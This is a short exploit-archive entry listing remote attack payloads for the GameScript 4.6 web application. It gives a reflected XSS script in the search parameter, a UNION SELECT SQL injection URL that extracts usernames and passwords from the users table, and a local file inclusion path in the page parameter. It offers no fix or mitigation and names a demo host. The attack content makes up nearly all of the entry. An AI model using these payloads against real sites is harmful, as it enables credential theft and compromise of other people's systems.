GameScript 4.6 (XSS/SQL/LFI) Multiple Remote Vulnerabilities

2009-01-28T00:00:00
ID 1337DAY-ID-4743
Type zdt
Reporter Encrypt3d.M!nd
Modified 2009-01-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
GameScript 4.6 (XSS/SQL/LFI) Multiple Remote Vulnerabilities
============================================================


GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabillities i think

Iam Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include



#  0day.today [2018-03-16]  #